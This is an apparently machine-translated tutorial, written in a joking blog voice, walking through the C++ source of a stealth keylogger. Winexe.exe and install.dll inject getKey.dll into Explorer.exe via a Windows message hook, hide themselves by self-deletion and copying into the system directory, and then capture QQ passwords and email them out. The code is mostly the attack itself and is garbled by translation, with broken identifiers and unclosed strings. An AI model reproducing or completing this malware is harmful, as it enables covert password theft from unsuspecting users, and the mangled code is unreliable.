If you read my
Before you officially involve the code, let's take a look at some conditions! First we have to understand such a fact: how to enter a process memory space? In other words, how to let the function of performing the task enter another program? The most standardized approach is the system-level HOOK function! If there is a dynamic library in the hook, that power is increased, you can interfere with the normal work of other processes! Second, memory map! By mapping space, we can share data in space in different processes and be part of their own process space. I don't use the shared data segment, because in multiple DLLs and EXE, the data should be consistent, I think the memory map is convenient!
Now let me talk about the composition of the program, the program has three project files: Winexe.exe, install.dll, getKey.dll. 1. Winexe.exe is running install.dll after running. 2. There is an auxiliary function in Install.dll, and implement GetKey.dll into the process of entering it, this program is inserted into Explorer.exe. At this time, getKey.dll can be desired for J! (Set the hook, capture button, send mail) Is it a bit like a wooden horse? Of course, there are some small details that make Winexe.exe and install.dll disappear in memory, and you simultaneously press [Ctrl Alt Delete] key key to find the process of Winexe.exe, if You can use the process viewer, you can see getKey.dll has become part of the ExEplorer.exe process, all ~~!
Maybe, you will ask: Why don't you use WINEXE to put getKey into other processes? ?
This is unreasonable, because Winexe is different from eachpore.exe, which is usually accessible to each other! So I used a mediation tool (Install.dll) to inject getKey.dll into Exepore.exe. Is it a bit like a rocket to enter the space check? Haha, I will talk! I now use an illustration to explain: Figure 1
The main thinking is the case, now we will enter the code according to the illustration! Remember: Our ultimate goal is to enter Explorer ~~ First we find the process we have to inject in the system snapshot (if not, please go, 嘻嘻) The following code is found through the snapshot to find ExEplorer.exe Process ID (You can choose other objects) In WINDEXE we mainly get the following three data: one is a target process, one is the handle of Winexe.exe, and one is the path where the current Winexe is located. What is the role of the handle?嘻 ~ ~~~ Maybe someone will say that Winexe's handle is meaningless, but don't forget that the memory map I have introduced, its appearance, the situation is not the same! What is the use of a path? Very simple, no matter where the program is running, its home is only one, that is, shift to the system directory! Remember this path is preparing for it! what! And suicide! Hey ~~ That's true ~! Word cwinExedlg :: findprocessid () {
DWORD DWID;
Handle M_Handle = :: CreateToolHelp32Snapshot (TH32CS_SNAPALL, 0);
Processentry32 * info = new processentry32;
Info-> dwsize = sizeof (Processentry32);
Bool bfind = process32first (m_handle, info);
While (bfind)
{
CString strbigwrite;
Strbigwrite = info-> szexefile;
Strbigwrite.makeupper ();
IF (StrbigWrite.Find ("Explorer.exe")! = -1)
{
DWID = INFO-> TH32PROCESSID;
Bfind = false;
Break;
}
bfind = process32next (m_handle, info);
}
DELETE INFO;
INFO = NULL;
CloseHandle (M_Handle);
Return DWID;
}
The path and handle are easy to get, and these three information are incorporated into install.dll! Install.dll is a processing plant that will be sent from the original village material processing! Before entering install.dll, let's take a look at what equipment is there? ! J
The following structures and shared data segments are one thing! However, my shared data is a structural variable, ready to let it record shared information!
Typedef struct _installinfo
{
Char m_cpath [256]; // path
DWORD M_DWEXPLORERID; // J Is it still used?
DWORD M_DWGETKEYTHREADID; / / Take a look at the after CreateThread
HWnd m_hwnd; // Record the handle of Winexe
} Installsharedata;
After watching the equipment, do we have to see how to process raw materials? First put the raw materials into the device (corresponding to the above structure)
Void InstallInfo (Char CPath [], HWND HWND, DWORD DWPRID)
{
// Memset ((Installsharedata *) lpinmem, 0, sizeof (installsharedata); pinshare-> m_dwexplorerid = dwprid;
Pinshare-> m_hwnd = hwnd;
Pinshare-> m_dwgetKeythreadID = 0;
STRCPY (Pinshare-> M_CPATH, CPATH);
IF (HinhookMSG == NULL)
Hinhookmsg = setwindowshookex (wh_getMessage, getmsgproc, g_hinstance, null);
}
Oh, have you seen it? I used hooks! The role of this hook is: When GetMessage finds a message in the queue, it starts to process the message! Let's take a look at this hook to do something, how is GetKe to inject EXEPLORE.EXE? LResult WinAPI GetMsgProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
IF (ncode> = 0)
{
IF (Pinshare-> m_dwexplorerid! = 0 && getCurrentProcessId () == Pinshare-> m_dwexplorerid)
{
Pinshare-> m_dwexplorerid = 0; // no longer need to monitor the Explorer process
CreateThread (NULL, 0, (LPTHREAD_START_ROUTINE) OPERATTHREADPRO, NULL, 0, & (Pinshare-> m_dwgetKeythreadID);
}
}
Return CallNexthookex (Hinhookmsg, Ncode, WPARAM, LPARAM);
}
Some people say that getcurrentProcessid () is not equal to pinshare-> m_dwexploerid, huh, what is going to be pinshare-> m_dwexploreId is not zero! If you speak from ordinary, this is true! Because your current getCurrentProcessId () gets the Winexe process ID, how can I equal with Explorer's process ID? Here I used debugging, and the comparison result is entered into the file, it is really not equal! But when you initiate the address of the memory map, it is to give the first address of the map space to the structural variable at the entrance to the DLL library (DLLMain), SIGH ~~~~~~ What? To put it bluntly, the handle of memory maps into structural variables! Hey ~~ This way, they have equal possible! However, at this time, getcurretnprocessid () is not the winexe ID, has entered the address space of Explorer!看 官 Note: Let's take a look at the CreateThread function, what is the consequence of it? Oh ~~ Created a new thread in ExEplorer! Well, let's lock your eyes in the global thread function of OperateThreadpro! Look at what it is doing again! ! ! !
Void OperateThreadPro (LPVOID PPARAM)
{
Typedef void (WinApi * fun); hmodule hmodule;
Fun installgetKey;
Char csyspath [256];
:: GetSystemDirectory (Csyspath, 256);
Strcat (csyspath, "//getkey.dll);
HModule = loadingLibrary (CSYSPATH); // System Directory
InstallgetKey = (FUN) GetProcadDress (HModule, "InstallgetKey);
IF (InstallgetKey! = NULL)
{
InstallgetKey (); // Current thread is not end, please see it
}
Else // This situation rarely happened! {
Freelibrary (hmodule);
Return;
}
Hey, how is it, have you seen it? A key place is dynamic call getKey.dll, is it? ! What, you have already, then you waste time? 5555J Dynamically load the DLL, naturally do key functions inside: installgetKey (), now we only care about getKey.dll, isn't it? The raw materials have been processed into a product, to buy customers! what? Don't you sell? The current society is like there is too little person! L (leave your phone ~~ I want to do an interview ~~
Optimistic, this installgetKey () is an export function, otherwise there is undefined error in the above thread! There is also a structure in getKey.dll as follows:
Typedef struct _installinfo
{
Char m_cpath [256];
DWORD M_DWEXPLORERID;
DWORD M_DWGETKEYTHREADID;
HWND M_HWND;
} Installsharedata;
What ghosts? Is the same as the previous definition? ! To share you, don't write a few more, give it an initial value? Oh, isn't the handle of Winexe is mapped here? ! How is it, you have a path from EXE? You don't have it? Not anxious, don't hurry, look after it! J
I have post this function! So long, so bother, huh, huh! !
void installgetKey ()
{
Handle H = OpenFilemapping (file_map_write | file_map_read, false, _t ("memnameinstall");
IF (h! = 0)
{
LPVOID P = MapViewOffile (h, file_map_read, 0, 0, 0);
p_data = (installsharedata *) p;
IF (p! = null)
{
:: Postmessage (p_data-> m_hwnd, wm_goodlook, 1, 1); // Send suicide commands for EXE
Sleep (100); // Wait for 100 milliseconds, this is a key! EXE suicide also takes a little more time ^ _ ^ unmapviewoffile (p);
After // EXE process, copy install.dll, exe and copy below the system directory / / and then drop the file DEL in the current directory! Char csexepath [256]; // Source Exe Path
Char csdllpath [256]; // Source INSTALL path
Char cdexepath [256]; // destination EXE path
Char cddllpath [256]; // destination DLL path
STRCPY (csexepath, p_data-> m_cpath); // Current directory
STRCPY (CSDLLPATH, P_DATA-> M_CPATH);
STRCAT (CSEXEPATH, "//winexe.exe"" ;/ belt file name
STRCAT (CSDLLPATH, "//install.dll");
:: GetSystemDirectory (CDExEPATH, 256); // System Directory
:: GetSystemDirectory (CDDLLPATH, 256);
STRCAT (CDEXEPATH, "//winexe.exe");
STRCAT (CDDLLPATH, "//install.dll");
IF (strcmpick (cdexepath, csexepath)! = 0)
{
Copyfile (Csexepath, CDExEPATH, FALSE);
IF (! :: deletefile (csesexepath))
{
OFSTREAM FS;
fs.open ("D: //_Error_1.txt", iOS :: App);
FS << "Error code =" << getLastError () << endl;
fs.close ();
}
}
IF (strcmp (cddlpath, csdllpath)! = 0)
{
CopyFile (CSDLLPATH, CDDLLPATH, FALSE);
IF (! :: deletefile (csdllpath))
{
OFSTREAM FD;
fd.open ("D: //_ERROR_2.TXT", iOS :: App);
FD << "Error Code =" << getLastError () << endl;
fd.close ();
}
}
}
CloseHandle (H);
}
MSG msg;
Settimer (NULL, 1, 1000, (TimerProc) TimerProc
While (GetMessage (& MSG, NULL, 0, 0))
{
TranslateMessage (& MSG);
DispatchMessage (& MSG);
}
// exitthread (0); // Exit the thread // (If you really exit, remember to close the hook)
}
how about it? This function is still not complicated! Ha ha! I have done a detailed note, I believe you can understand!
I simply say: 1.PostMessage (p_data-> m_hwnd, wm_goodlook, 1, 1) This is sent to let WINEXE suicide! Winexe After receiving WM_Gooklook, the proves that the injection has been completed, Winexe has no effect, no The role is dead, so cruel! 2. Settimer (NULL, 1, 1000, (TimerProc) TimerProc, issue TIMER events, the surveillance work begins, this and the 1.0 version is small!
3. Don't forget, this function works in an auxiliary thread function, there are two cases of thread functions: a situation is self-ending, this feeling is a safe end; if there is a situation is the end of the process, it must end without condition ! Here, we can't let it end, I use a message to loop, let the loop continue its life! Of course, if you want to end it, you can define a global variable, to define the structure of the memory map, just check this value when loading getKey.dll in install.dll, you can judge the thread is not over the end through this value. If there is no end, you want to end it, then send a message, but, send this news to be a bit art, you have to use the system broadcast: sendMessage (hwnd_broadcast, wm_yourdefine, 0, 0) add one in the above message loop Judgment is OK!
At this point, the program has already been paragraph! The rest of the part and the process in the 1.0 version: Set the hook -> to find the QQ window -> Capture the ammonium key -> Record password -> Total five numbers send once! If you see what flaws, please tell me! ^ _ ^
